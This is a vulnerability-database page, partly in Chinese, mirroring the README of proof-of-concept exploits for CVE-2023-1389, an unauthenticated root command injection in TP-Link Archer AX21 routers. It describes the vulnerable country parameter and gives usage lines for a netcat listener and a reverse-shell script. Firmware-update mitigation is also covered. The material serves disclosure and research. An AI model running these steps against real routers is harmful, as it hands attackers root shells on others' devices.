关联漏洞
标题:TP-LINK Archer AX21 命令注入漏洞 (CVE-2023-1389)Description:TP-LINK Archer AX21是中国普联(TP-LINK)公司的一款无线路由器。 TP-LINK Archer AX21 1.1.4 Build 20230219之前的固件版本存在安全漏洞,该漏洞源于存在命令注入漏洞,未经身份验证的攻击者利用该漏洞可以通过简单的POST请求注入以root身份运行的命令。
介绍
# Description
CVE-2023–1389 is an Unauthenticated Command Injection vulnerability in the TP-Link Archer AX21 WiFi router. A calllback in the **country** parameter uses the **popen()** function, which is run as root, allowing the attacker to inject arbitrary values through GET or POST requests to the admin interface, without requiring authentication. More details about the vulnerability can be found [here](https://www.tenable.com/security/research/tra-2023-11).
These are a couple of Proof-of-Concepts I created while exploring the command injection. Archer-file-transfer.py was the first iteration and is fairly convaluted in how it achieves interaction. Archer-rev-shell.py gives you a simple netcat reverse shell, and is likely the one you're here for. If you would like to learn more about the development of these scripts you can read the post [here](https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94).
## Usage
In one terminal window:
```
nc your_IP listener_port
```
In a second terminal window:
```
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
```
## Mitigation
TP-Link has released firmware version 1.1.4 Build 20230219 which fixes the issue by removing the vulnerable callback. Updating your router to the latest firmware should protect your device.
## Future
I will likely not be maintaining these PoCs. Both are pretty simple and should be easy to modify as needed.
文件快照
[4.0K] /data/pocs/02b94456a230ae609110fc756f0f4505ad601e6b
├── [3.4K] archer-file-transfer.py
├── [2.8K] archer-rev-shell.py
└── [1.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。